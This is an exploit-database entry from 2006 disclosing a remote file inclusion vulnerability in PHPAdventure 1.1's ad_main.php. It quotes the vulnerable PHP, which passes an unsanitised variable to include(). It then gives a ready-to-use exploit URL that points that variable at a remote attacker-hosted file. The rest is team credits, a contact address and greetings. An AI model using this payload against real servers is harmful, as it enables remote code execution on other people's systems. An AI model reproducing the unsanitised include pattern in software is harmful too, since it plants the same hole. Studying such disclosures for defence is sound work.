[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability
# Published : 2006-11-07
# Author : HER0
# Previous Title : iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability
# Next Title : Soholaunch Pro <= 4.9 r36 Remote File Inclusion Vulnerabilities
*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contac:16.her0@gmail.com
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:
<?php
$_stage = 1;
include($_mygamefile);
?>
exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
www.domteam.info
greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************
# www.Syue.com [2006-11-07]